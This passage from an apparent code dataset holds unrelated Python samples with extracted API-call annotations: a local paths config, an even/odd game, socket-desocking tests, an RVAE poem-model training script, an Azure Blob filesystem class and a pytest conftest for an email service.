'numpy.transpose', 'np.transpose', (['FCP_Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(FCP_Beamform_stft[spk_idx], [0, 2, 1])\n', (16822, 16861), True, 'import numpy as np\n'), ((16973, 17027), 
'numpy.transpose', 'np.transpose', (['Origin_Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(Origin_Beamform_stft[spk_idx], [0, 2, 1])\n', (16985, 17027), True, 'import numpy as np\n'), ((10421, 10564), 'convolutive_prediction.Apply_ConvolutivePrediction', 'Apply_ConvolutivePrediction', (['observe', 'source', 'self.num_spks', 'self.predictionType', 'self.tapDelay', 'self.nTap', 'self.reverb_variance_flowValue'], {}), '(observe, source, self.num_spks, self.\n predictionType, self.tapDelay, self.nTap, self.reverb_variance_flowValue)\n', (10448, 10564), False, 'from convolutive_prediction import Apply_ConvolutivePrediction\n'), ((10969, 11017), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (10982, 11017), False, 'import torch\n'), ((11373, 11421), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (11386, 11421), False, 'import torch\n'), ((13018, 13066), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (13031, 13066), False, 'import torch\n'), ((13714, 13762), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (13727, 13762), False, 'import torch\n'), ((14100, 14148), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (14113, 14148), False, 'import torch\n'), ((14498, 14546), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (14511, 14546), False, 'import torch\n'), ((15781, 15828), 'numpy.transpose', 'np.transpose', (['dereverb_stft[spk_idx]', '[0, 2, 1]'], {}), '(dereverb_stft[spk_idx], [0, 2, 1])\n', (15793, 15828), True, 'import numpy as np\n'), ((15912, 15959), 'numpy.transpose', 'np.transpose', (['Beamform_stft[spk_idx]', '[0, 2, 1]'], 
{}), '(Beamform_stft[spk_idx], [0, 2, 1])\n', (15924, 15959), True, 'import numpy as np\n'), ((16078, 16125), 'numpy.transpose', 'np.transpose', (['Beamform_stft[spk_idx]', '[0, 2, 1]'], {}), '(Beamform_stft[spk_idx], [0, 2, 1])\n', (16090, 16125), True, 'import numpy as np\n'), ((16393, 16443), 'numpy.squeeze', 'np.squeeze', (['DNN_WPE_dereverb_stft[spk_idx]'], {'axis': '(0)'}), '(DNN_WPE_dereverb_stft[spk_idx], axis=0)\n', (16403, 16443), True, 'import numpy as np\n'), ((16690, 16736), 'numpy.squeeze', 'np.squeeze', (['FCP_dereverb_stft[spk_idx]'], {'axis': '(0)'}), '(FCP_dereverb_stft[spk_idx], axis=0)\n', (16700, 16736), True, 'import numpy as np\n'), ((9515, 9563), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (9528, 9563), False, 'import torch\n'), ((9856, 9904), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (9869, 9904), False, 'import torch\n'), ((10228, 10276), 'torch.permute', 'torch.permute', (['MISO1_stft[spk_idx]', '[0, 3, 1, 2]'], {}), '(MISO1_stft[spk_idx], [0, 3, 1, 2])\n', (10241, 10276), False, 'import torch\n'), ((9378, 9415), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (9391, 9415), False, 'import torch\n'), ((13257, 13294), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (13270, 13294), False, 'import torch\n'), ((11052, 11089), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (11065, 11089), False, 'import torch\n'), ((11456, 11493), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (11469, 11493), False, 'import torch\n'), ((10315, 10352), 'torch.permute', 'torch.permute', (['mix_stft', '[0, 3, 1, 2]'], {}), '(mix_stft, [0, 3, 1, 2])\n', (10328, 10352), False, 'import torch\n')] |
# Absolute paths to locally cloned Hugging Face repositories.
# NOTE(review): machine-specific hard-coded paths; consider deriving them from
# an environment variable or a config file instead.
import os
TRANSFORMERS = '/home/noone/documents/github/transformers'
TOKENIZERS = '/home/noone/documents/github/tokenizers'
DATASETS = '/home/noone/documents/github/datasets'
# Commonly used sub-directories inside the transformers checkout.
MODELS = os.path.join(TRANSFORMERS, 'src/transformers/models')
DEBERTA_V2 = os.path.join(MODELS, 'deberta_v2')
DEBERTA_V3 = os.path.join(MODELS, 'deberta-v3-base')
ENCODER_DECODER = os.path.join(MODELS, 'encoder_decoder')
HUGGINGFACE_HUB = '/home/noone/documents/github/huggingface_hub'
# The string below is a free-standing literal used purely as documentation.
"""
Huggingface Repos Cloned:
- transformers
- tokenizers
= optimum
- datasets
- huggingface_hub
- accelerate
- notebooks
- blog
- huggingface sagemaker snowflake example
- education toolkit
- evaluate
- knockknock
- neuralcoref
- mongoku
- data-measurements-tool
- neural compressor
- allennlp
- pytorch-openai-transformer-lm
- pytorch pretrained bigGAN
- awesome NLP discussion papers
- torchMoji
- naacl_transfer_learning_tutorial
-
"""
"os.path.join"
] | [((188, 241), 'os.path.join', 'os.path.join', (['TRANSFORMERS', '"""src/transformers/models"""'], {}), "(TRANSFORMERS, 'src/transformers/models')\n", (200, 241), False, 'import os\n'), ((256, 290), 'os.path.join', 'os.path.join', (['MODELS', '"""deberta_v2"""'], {}), "(MODELS, 'deberta_v2')\n", (268, 290), False, 'import os\n'), ((305, 344), 'os.path.join', 'os.path.join', (['MODELS', '"""deberta-v3-base"""'], {}), "(MODELS, 'deberta-v3-base')\n", (317, 344), False, 'import os\n'), ((364, 403), 'os.path.join', 'os.path.join', (['MODELS', '"""encoder_decoder"""'], {}), "(MODELS, 'encoder_decoder')\n", (376, 403), False, 'import os\n')] |
# Even or Odd: play until the player loses, then show the consecutive-win streak.
from random import randint
c = 0  # consecutive wins
while True:
    print('\033[1;33m-' * 30)
    n = int(input('ESCOLHA UM NÚMERO: '))
    e = str(input('PAR OU IMPAR? ')).strip().upper()
    print('-' * 30)
    # ROBUSTNESS FIX: the original indexed [0] before validating, so an empty
    # answer raised IndexError; validate first, then take the first character.
    if not e or e[0] not in 'PI':
        print('\033[1;31mOPÇÃO INVALIDA, TENTE DENOVO!')
        continue
    e = e[0]
    j = randint(0, 10)
    total_is_even = (n + j) % 2 == 0
    if e == 'P':
        if total_is_even:
            c += 1
            print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
        else:
            break
    else:  # e == 'I'
        if total_is_even:
            break
        else:
            c += 1
            print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
print(f'\033[1;31mGAME OVER!\nEU ESCOLHI {j} E VOCÊ {n}\nVOCÊ FEZ UMA SEQUENCIA DE {c} PONTOS!')
| [
"random.randint"
] | [((283, 297), 'random.randint', 'randint', (['(0)', '(10)'], {}), '(0, 10)\n', (290, 297), False, 'from random import randint\n')] |
"""
This file tests that sendmmsg works correctly.
Target files:
- libdesock/src/write.c
"""
import ctypes
import desock
import helper
data = bytes(range(65, 115))
cursor = 0
def _get_data(size):
global cursor
ret = bytes(data[cursor: cursor + size])
assert(len(ret) == size)
cursor += size
return ret
def test_sendmmsg():
    """sendmmsg() must accept zero messages and write every iovec in order."""
    fd = desock._debug_instant_fd(0)
    assert desock.sendmmsg(fd, None, 0, 0) == 0
    headers = (desock.mmsghdr * 2)()
    for i in range(2):
        iov = helper.create_iovec(5, 5, datafunc=_get_data)
        headers[i] = helper.create_mmsghdr(helper.create_msghdr(iov=iov))
    with helper.StdoutPipe() as pipe:
        assert desock.sendmmsg(fd, headers, 2, 0) == 2
        assert pipe.read(50) == data
def test_sendto():
    """sendto() must forward the whole buffer and return the byte count."""
    payload = ctypes.create_string_buffer(bytes(range(128)))
    fd = desock._debug_instant_fd(0)
    with helper.StdoutPipe() as pipe:
        assert desock.sendto(fd, payload, 128, 0, None, 0) == 128
        assert pipe.read(128) == payload[:128]
def test_sendmsg():
    """sendmsg() must write all iovec entries and return the total byte count."""
    global cursor
    cursor = 0  # rewind the shared payload for this test
    hdr = helper.create_msghdr(iov=helper.create_iovec(5, 10, datafunc=_get_data))
    fd = desock._debug_instant_fd(0)
    with helper.StdoutPipe() as pipe:
        assert desock.sendmsg(fd, hdr, 0) == 50
        assert pipe.read(50) == data
def test_writev():
    """writev() must write all iovec entries and return the total byte count."""
    global cursor
    cursor = 0  # rewind the shared payload for this test
    vec = helper.create_iovec(5, 10, datafunc=_get_data)
    fd = desock._debug_instant_fd(0)
    with helper.StdoutPipe() as pipe:
        assert desock.writev(fd, vec, 5) == 50
        assert pipe.read(50) == data
| [
"desock.sendmsg",
"helper.StdoutPipe",
"helper.create_iovec",
"desock.writev",
"desock._debug_instant_fd",
"desock.sendmmsg",
"desock.sendto"
] | [((361, 388), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (385, 388), False, 'import desock\n'), ((937, 964), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (961, 964), False, 'import desock\n'), ((1274, 1301), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (1298, 1301), False, 'import desock\n'), ((1506, 1552), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(10)'], {'datafunc': '_get_data'}), '(5, 10, datafunc=_get_data)\n', (1525, 1552), False, 'import helper\n'), ((1562, 1589), 'desock._debug_instant_fd', 'desock._debug_instant_fd', (['(0)'], {}), '(0)\n', (1586, 1589), False, 'import desock\n'), ((405, 436), 'desock.sendmmsg', 'desock.sendmmsg', (['fd', 'None', '(0)', '(0)'], {}), '(fd, None, 0, 0)\n', (420, 436), False, 'import desock\n'), ((726, 745), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (743, 745), False, 'import helper\n'), ((979, 998), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (996, 998), False, 'import helper\n'), ((1316, 1335), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (1333, 1335), False, 'import helper\n'), ((1604, 1623), 'helper.StdoutPipe', 'helper.StdoutPipe', ([], {}), '()\n', (1621, 1623), False, 'import helper\n'), ((770, 805), 'desock.sendmmsg', 'desock.sendmmsg', (['fd', 'mmsghdrs', '(2)', '(0)'], {}), '(fd, mmsghdrs, 2, 0)\n', (785, 805), False, 'import desock\n'), ((1023, 1063), 'desock.sendto', 'desock.sendto', (['fd', 'data', '(128)', '(0)', 'None', '(0)'], {}), '(fd, data, 128, 0, None, 0)\n', (1036, 1063), False, 'import desock\n'), ((1217, 1263), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(10)'], {'datafunc': '_get_data'}), '(5, 10, datafunc=_get_data)\n', (1236, 1263), False, 'import helper\n'), ((1360, 1389), 'desock.sendmsg', 'desock.sendmsg', (['fd', 'msghdr', '(0)'], {}), '(fd, msghdr, 0)\n', (1374, 1389), False, 'import desock\n'), ((1648, 1673), 
'desock.writev', 'desock.writev', (['fd', 'iov', '(5)'], {}), '(fd, iov, 5)\n', (1661, 1673), False, 'import desock\n'), ((551, 596), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(5)'], {'datafunc': '_get_data'}), '(5, 5, datafunc=_get_data)\n', (570, 596), False, 'import helper\n'), ((664, 709), 'helper.create_iovec', 'helper.create_iovec', (['(5)', '(5)'], {'datafunc': '_get_data'}), '(5, 5, datafunc=_get_data)\n', (683, 709), False, 'import helper\n')] |
import argparse
import os
import shutil
import numpy as np
import torch as t
from torch.optim import Adam
from utils.batch_loader import BatchLoader
from utils.parameters import Parameters
from model.rvae_dilated import RVAE_dilated
# Training entry point for the dilated-convolution RVAE on the poem corpus.
# Flow: parse CLI args -> build data loader / model / optimizer (optionally
# resuming from a checkpoint) -> epoch loop of train + validate steps with
# periodic sampling and rolling checkpoints -> save final model plus the
# reconstruction/KLD curves as .npy files.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='RVAE_dilated')
    parser.add_argument('--num-epochs', type=int, default=25000, metavar='ES',
                        help='num epochs (default: 25000)')
    parser.add_argument('--start-epoch', default=0, type=int, metavar='E',
                        help='manual epoch index (useful on restarts)')
    parser.add_argument('--batch-size', type=int, default=45, metavar='BS',
                        help='batch size (default: 45)')
    # NOTE(review): argparse `type=bool` treats any non-empty string as True,
    # so `--use-cuda False` still enables CUDA; left unchanged here.
    parser.add_argument('--use-cuda', type=bool, default=True, metavar='CUDA',
                        help='use cuda (default: True)')
    parser.add_argument('--learning-rate', type=float, default=0.0005, metavar='LR',
                        help='learning rate (default: 0.0005)')
    parser.add_argument('--dropout', type=float, default=0.3, metavar='DR',
                        help='dropout (default: 0.3)')
    parser.add_argument('--use-trained', default='', metavar='UT',
                        help='load pretrained model (default: None)')
    parser.add_argument('--ret-result', default='', metavar='CE',
                        help='ce result path (default: '')')
    parser.add_argument('--kld-result', default='', metavar='KLD',
                        help='ce result path (default: '')')
    args = parser.parse_args()
    prefix = 'poem'
    word_is_char = True  # character-level tokenisation flag, forwarded to BatchLoader
    batch_loader = BatchLoader('', prefix, word_is_char)
    best_ret = 9999999  # lowest validation reconstruction error seen so far
    is_best = False
    if not os.path.exists('data/' + batch_loader.prefix + 'word_embeddings.npy'):
        raise FileNotFoundError("word embeddings file was't found")
    parameters = Parameters(batch_loader.max_word_len,
                            batch_loader.max_seq_len,
                            batch_loader.words_vocab_size,
                            batch_loader.chars_vocab_size, word_is_char)
    rvae = RVAE_dilated(parameters, batch_loader.prefix)
    optimizer = Adam(rvae.learnable_parameters(), args.learning_rate)
    if args.use_trained:
        # resume: restore model/optimizer state and continue from the saved epoch
        checkpoint = t.load(args.use_trained)
        args.start_epoch = checkpoint['epoch']
        best_ret = checkpoint['best_ret']
        rvae.load_state_dict(checkpoint['state_dict'])
        optimizer.load_state_dict(checkpoint['optimizer'])
    if args.use_cuda and t.cuda.is_available():
        rvae = rvae.cuda()
    train_step = rvae.trainer(optimizer, batch_loader)
    validate = rvae.validater(batch_loader)
    ret_result = []  # per-epoch validation reconstruction error
    kld_result = []  # per-epoch validation KL divergence
    for epoch in range(args.start_epoch, args.num_epochs):
        train_ret, train_kld, train_kld_coef = train_step(epoch, args.batch_size, args.use_cuda and t.cuda.is_available(), args.dropout)
        train_ret = train_ret.data.cpu().numpy()[0]
        train_kld = train_kld.data.cpu().numpy()[0]
        valid_ret, valid_kld = validate(args.batch_size, args.use_cuda and t.cuda.is_available())
        valid_ret = valid_ret.data.cpu().numpy()[0]
        valid_kld = valid_kld.data.cpu().numpy()[0]
        ret_result += [valid_ret]
        kld_result += [valid_kld]
        # model selection is based on validation reconstruction error only
        is_best = valid_ret < best_ret
        best_ret = min(valid_ret, best_ret)
        print('[%s]---TRAIN-ret[%s]kld[%s]------VALID-ret[%s]kld[%s]'%(epoch, train_ret, train_kld, valid_ret, valid_kld))
        if epoch != 1 and epoch % 10 == 9:
            # every 10 epochs: draw one latent vector and print a generated sample
            seed = np.random.normal(size=[1, parameters.latent_variable_size])
            sample = rvae.sample(batch_loader, 50, seed, args.use_cuda and t.cuda.is_available(), None, 1)
            print('[%s]---SAMPLE: %s'%(epoch, sample))
        if epoch != 0 and epoch % 100 == 99:
            # every 100 epochs: write a checkpoint, delete the one from 300
            # epochs ago (keep a rolling window of 3), and snapshot the best model
            checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, epoch+1)
            t.save({'epoch': epoch+1,
                    'state_dict': rvae.state_dict(),
                    'best_ret': best_ret,
                    'optimizer': optimizer.state_dict()}, checkpoint_filename)
            oldest = epoch+1-3*100
            oldest_checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, oldest) if oldest>0 else None
            if oldest_checkpoint_filename and os.path.isfile(oldest_checkpoint_filename):
                os.remove(oldest_checkpoint_filename)
            if is_best:
                shutil.copyfile(checkpoint_filename, './data/'+batch_loader.prefix+'trained_best_RVAE')
    # final snapshot after the last epoch, plus the recorded metric curves
    t.save({'epoch': args.num_epochs,
            'state_dict': rvae.state_dict(),
            'best_ret': best_ret,
            'optimizer': optimizer.state_dict()}, './data/'+batch_loader.prefix+'trained_last_RVAE')
    np.save(batch_loader.prefix+'ret_result_{}.npy'.format(args.ret_result), np.array(ret_result))
    np.save(batch_loader.prefix+'kld_result_npy_{}'.format(args.kld_result), np.array(kld_result))
| [
"numpy.random.normal",
"os.path.exists",
"utils.batch_loader.BatchLoader",
"argparse.ArgumentParser",
"torch.load",
"os.path.isfile",
"numpy.array",
"utils.parameters.Parameters",
"torch.cuda.is_available",
"shutil.copyfile",
"model.rvae_dilated.RVAE_dilated",
"os.remove"
] | [((281, 332), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""RVAE_dilated"""'}), "(description='RVAE_dilated')\n", (304, 332), False, 'import argparse\n'), ((1653, 1690), 'utils.batch_loader.BatchLoader', 'BatchLoader', (['""""""', 'prefix', 'word_is_char'], {}), "('', prefix, word_is_char)\n", (1664, 1690), False, 'from utils.batch_loader import BatchLoader\n'), ((1904, 2047), 'utils.parameters.Parameters', 'Parameters', (['batch_loader.max_word_len', 'batch_loader.max_seq_len', 'batch_loader.words_vocab_size', 'batch_loader.chars_vocab_size', 'word_is_char'], {}), '(batch_loader.max_word_len, batch_loader.max_seq_len,\n batch_loader.words_vocab_size, batch_loader.chars_vocab_size, word_is_char)\n', (1914, 2047), False, 'from utils.parameters import Parameters\n'), ((2140, 2185), 'model.rvae_dilated.RVAE_dilated', 'RVAE_dilated', (['parameters', 'batch_loader.prefix'], {}), '(parameters, batch_loader.prefix)\n', (2152, 2185), False, 'from model.rvae_dilated import RVAE_dilated\n'), ((1747, 1816), 'os.path.exists', 'os.path.exists', (["('data/' + batch_loader.prefix + 'word_embeddings.npy')"], {}), "('data/' + batch_loader.prefix + 'word_embeddings.npy')\n", (1761, 1816), False, 'import os\n'), ((2303, 2327), 'torch.load', 't.load', (['args.use_trained'], {}), '(args.use_trained)\n', (2309, 2327), True, 'import torch as t\n'), ((2564, 2585), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (2583, 2585), True, 'import torch as t\n'), ((4890, 4910), 'numpy.array', 'np.array', (['ret_result'], {}), '(ret_result)\n', (4898, 4910), True, 'import numpy as np\n'), ((4989, 5009), 'numpy.array', 'np.array', (['kld_result'], {}), '(kld_result)\n', (4997, 5009), True, 'import numpy as np\n'), ((3600, 3659), 'numpy.random.normal', 'np.random.normal', ([], {'size': '[1, parameters.latent_variable_size]'}), '(size=[1, parameters.latent_variable_size])\n', (3616, 3659), True, 'import numpy as np\n'), ((2916, 2937), 
'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (2935, 2937), True, 'import torch as t\n'), ((3133, 3154), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (3152, 3154), True, 'import torch as t\n'), ((4364, 4406), 'os.path.isfile', 'os.path.isfile', (['oldest_checkpoint_filename'], {}), '(oldest_checkpoint_filename)\n', (4378, 4406), False, 'import os\n'), ((4424, 4461), 'os.remove', 'os.remove', (['oldest_checkpoint_filename'], {}), '(oldest_checkpoint_filename)\n', (4433, 4461), False, 'import os\n'), ((4502, 4597), 'shutil.copyfile', 'shutil.copyfile', (['checkpoint_filename', "('./data/' + batch_loader.prefix + 'trained_best_RVAE')"], {}), "(checkpoint_filename, './data/' + batch_loader.prefix +\n 'trained_best_RVAE')\n", (4517, 4597), False, 'import shutil\n'), ((3735, 3756), 'torch.cuda.is_available', 't.cuda.is_available', ([], {}), '()\n', (3754, 3756), True, 'import torch as t\n')] |
__author__ = '<NAME>'
from os import path
from azure.storage.blob import BlockBlobService
from flow.core.abstract_filesystem import AbstractFilesystem, splitpath
class AzureBlobFilesystem(AbstractFilesystem):
    """Implementation of the Azure Blob Storage filesystem.

    Folders are emulated with empty ``<name>_$folder$`` marker blobs, since
    blob storage has no real directory hierarchy.
    https://docs.microsoft.com/en-us/azure/storage/blobs/storage-python-how-to-use-blob-storage#download-and-install-azure-storage-sdk-for-python"""
    def __init__(self, logger, context, **kwargs):
        """Connect to Azure Blob Storage using credentials from *context* settings.

        :raises ValueError: if the Azure credentials are missing or invalid.
        """
        super(AzureBlobFilesystem, self).__init__(logger, context, **kwargs)
        try:
            self.block_blob_service = BlockBlobService(account_name=context.settings['azure_account_name'],
                                                  account_key=context.settings['azure_account_key'])
        except EnvironmentError as e:
            self.logger.error('Azure Credentials are NOT valid. Terminating.', exc_info=True)
            raise ValueError(e)

    def __del__(self):
        # nothing to release: BlockBlobService holds no persistent connection
        pass

    def _azure_bucket(self, bucket_name):
        """Return *bucket_name*, falling back to the container configured in settings."""
        if not bucket_name:
            bucket_name = self.context.settings['azure_bucket']
        return bucket_name

    def mkdir(self, uri_path, bucket_name=None, **kwargs):
        """Emulate folder creation by writing an empty ``<name>_$folder$``
        marker blob at every level of *uri_path*."""
        def _create_folder_file():
            folder_key = path.join(root, '{0}_$folder$'.format(folder_name))
            if not self.block_blob_service.exists(azure_bucket, folder_key):
                self.block_blob_service.create_blob_from_text(azure_bucket, folder_key, '')

        azure_bucket = self._azure_bucket(bucket_name)
        root = ''
        for folder_name in splitpath(uri_path):
            root = path.join(root, folder_name)
            _create_folder_file()

    def rmdir(self, uri_path, bucket_name=None, **kwargs):
        """Delete every blob whose name starts with ``uri_path/``."""
        azure_bucket = self._azure_bucket(bucket_name)
        for blob in self.block_blob_service.list_blobs(azure_bucket, prefix='{0}/'.format(uri_path)):
            # BUGFIX: list_blobs yields Blob objects, while delete_blob expects
            # the blob *name* string - pass blob.name instead of the object.
            self.block_blob_service.delete_blob(azure_bucket, blob.name)

    def rm(self, uri_path, bucket_name=None, **kwargs):
        """Delete a single blob at *uri_path*."""
        azure_bucket = self._azure_bucket(bucket_name)
        self.block_blob_service.delete_blob(azure_bucket, uri_path)

    def cp(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
        """Server-side copy of a blob, possibly across containers."""
        azure_bucket_source = self._azure_bucket(bucket_name_source)
        azure_bucket_target = self._azure_bucket(bucket_name_target)
        source_blob_url = self.block_blob_service.make_blob_url(azure_bucket_source, uri_source)
        self.block_blob_service.copy_blob(azure_bucket_target, uri_target, source_blob_url)

    def mv(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
        """Move = copy to the target, then delete the source blob."""
        self.cp(uri_source, uri_target, bucket_name_source, bucket_name_target, **kwargs)
        self.rm(uri_source, bucket_name_source)

    def copyToLocal(self, uri_source, uri_target, bucket_name_source=None, **kwargs):
        """Download blob *uri_source* into the local file *uri_target*."""
        azure_bucket_source = self._azure_bucket(bucket_name_source)
        with open(uri_target, 'wb') as file_pointer:
            self.block_blob_service.get_blob_to_stream(azure_bucket_source, uri_source, file_pointer)

    def copyFromLocal(self, uri_source, uri_target, bucket_name_target=None, **kwargs):
        """Upload the local file *uri_source* to blob *uri_target*."""
        azure_bucket_target = self._azure_bucket(bucket_name_target)
        with open(uri_source, 'rb') as file_pointer:
            self.block_blob_service.create_blob_from_stream(azure_bucket_target, uri_target, file_pointer)

    def exists(self, uri_path, bucket_name=None, exact=False, **kwargs):
        """Return True if a blob exists at *uri_path*.

        With ``exact=False`` an emulated folder (its ``_$folder$`` marker blob,
        as written by :meth:`mkdir`) also counts as existing.
        """
        azure_bucket = self._azure_bucket(bucket_name)
        is_found = self.block_blob_service.exists(azure_bucket, uri_path)
        if exact is False and is_found is False:
            folder_name = '{0}_$folder$'.format(path.basename(uri_path))
            folder_key = path.join(uri_path, folder_name)
            is_found = self.block_blob_service.exists(azure_bucket, folder_key)
        return is_found
| [
"flow.core.abstract_filesystem.splitpath",
"os.path.basename",
"os.path.join",
"azure.storage.blob.BlockBlobService"
] | [((1577, 1596), 'flow.core.abstract_filesystem.splitpath', 'splitpath', (['uri_path'], {}), '(uri_path)\n', (1586, 1596), False, 'from flow.core.abstract_filesystem import AbstractFilesystem, splitpath\n'), ((596, 720), 'azure.storage.blob.BlockBlobService', 'BlockBlobService', ([], {'account_name': "context.settings['azure_account_name']", 'account_key': "context.settings['azure_account_key']"}), "(account_name=context.settings['azure_account_name'],\n account_key=context.settings['azure_account_key'])\n", (612, 720), False, 'from azure.storage.blob import BlockBlobService\n'), ((1617, 1645), 'os.path.join', 'path.join', (['root', 'folder_name'], {}), '(root, folder_name)\n', (1626, 1645), False, 'from os import path\n'), ((3793, 3825), 'os.path.join', 'path.join', (['uri_path', 'folder_name'], {}), '(uri_path, folder_name)\n', (3802, 3825), False, 'from os import path\n'), ((3743, 3766), 'os.path.basename', 'path.basename', (['uri_path'], {}), '(uri_path)\n', (3756, 3766), False, 'from os import path\n')] |
import asyncio
import pytest
import re
import uuid
from aiohttp.test_utils import teardown_test_loop
from aioredis import create_redis
from arq import ArqRedis, Worker
from atoolbox.db import prepare_database
from atoolbox.db.helpers import DummyPgPool
from atoolbox.test_utils import DummyServer, create_dummy_server
from buildpg import Values, asyncpg
from morpheus.app.main import create_app
from morpheus.app.models import EmailSendModel, SendMethod
from morpheus.app.settings import Settings
from morpheus.app.views import get_create_company_id
from morpheus.app.worker import startup as worker_startup, worker_functions
from . import dummy_server
def pytest_addoption(parser):
    """Register the ``--reuse-db`` command line flag with pytest."""
    parser.addoption(
        '--reuse-db',
        action='store_true',
        default=False,
        help='keep the existing database if it exists',
    )
pg_settings = dict(pg_dsn='postgres://postgres:waffle@localhost:5432/morpheus_test')
@pytest.fixture(scope='session', name='clean_db')
def _fix_clean_db(request):
    """Create (or, with --reuse-db, keep) the test database once per session."""
    # loop fixture has function scope so can't be used here.
    settings = Settings(**pg_settings)
    loop = asyncio.new_event_loop()
    loop.run_until_complete(prepare_database(settings, not request.config.getoption('--reuse-db')))
    teardown_test_loop(loop)
@pytest.fixture(name='db_conn')
async def _fix_db_conn(loop, settings, clean_db):
    """Yield a db connection inside a transaction that is rolled back on teardown."""
    conn = await asyncpg.connect_b(dsn=settings.pg_dsn, loop=loop)
    tr = conn.transaction()
    await tr.start()
    await conn.execute("set client_min_messages = 'log'")
    yield conn
    # undo everything the test wrote, then close the connection
    await tr.rollback()
    await conn.close()
@pytest.yield_fixture
async def redis(loop, settings):
    """Yield a flushed ArqRedis connection; closed and awaited on teardown."""
    addr = settings.redis_settings.host, settings.redis_settings.port
    redis = await create_redis(addr, db=settings.redis_settings.database, encoding='utf8', commands_factory=ArqRedis)
    await redis.flushdb()
    yield redis
    redis.close()
    await redis.wait_closed()
@pytest.fixture(name='dummy_server')
async def _fix_dummy_server(aiohttp_server):
    """Start the stub HTTP server that stands in for the external services."""
    ctx = {'mandrill_subaccounts': {}}
    return await create_dummy_server(aiohttp_server, extra_routes=dummy_server.routes, extra_context=ctx)
@pytest.fixture
def settings(tmpdir, dummy_server: DummyServer):
    """Build a Settings object pointing all external service URLs at the dummy server."""
    return Settings(
        **pg_settings,
        auth_key='testing-key',
        test_output=str(tmpdir),
        pdf_generation_url=dummy_server.server_name + '/generate.pdf',
        mandrill_key='good-mandrill-testing-key',
        log_level='ERROR',
        mandrill_url=dummy_server.server_name + '/mandrill',
        mandrill_timeout=0.5,
        host_name=None,
        click_host_name='click.example.com',
        messagebird_key='good-messagebird-testing-key',
        messagebird_url=dummy_server.server_name + '/messagebird',
        stats_token='test-token',
        max_request_stats=10,
    )
@pytest.fixture(name='cli')
async def _fix_cli(loop, test_client, settings, db_conn, redis):
    """aiohttp test client for the morpheus app, wired to the test redis and db."""
    async def pre_startup(app):
        # swap in the test redis and the transaction-scoped pg connection
        app.update(redis=redis, pg=DummyPgPool(db_conn))
    app = create_app(settings=settings)
    app.update(pg=DummyPgPool(db_conn), webhook_auth_key=b'testing')
    app.on_startup.insert(0, pre_startup)
    cli = await test_client(app)
    # point the internal API client back at this test server
    cli.server.app['morpheus_api'].root = f'http://localhost:{cli.server.port}/'
    return cli
@pytest.fixture
def send_email(cli, worker):
    """Return a coroutine that POSTs an email send request and runs the worker.

    For a single recipient the coroutine returns the message's external id
    (``<uid>-<address>`` with unsafe characters stripped); for multiple
    recipients it returns ``NotImplemented``.
    """
    async def _send_message(status_code=201, **extra):
        data = dict(
            uid=str(uuid.uuid4()),
            main_template='<body>\n{{{ message }}}\n</body>',
            company_code='foobar',
            from_address='<NAME> <<EMAIL>>',
            method='email-test',
            subject_template='test message',
            context={'message': 'this is a test'},
            recipients=[{'address': '<EMAIL>'}],
        )
        # assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
        data.update(**extra)
        r = await cli.post('/send/email/', json=data, headers={'Authorization': 'testing-key'})
        assert r.status == status_code
        await worker.run_check()
        if len(data['recipients']) != 1:
            return NotImplemented
        else:
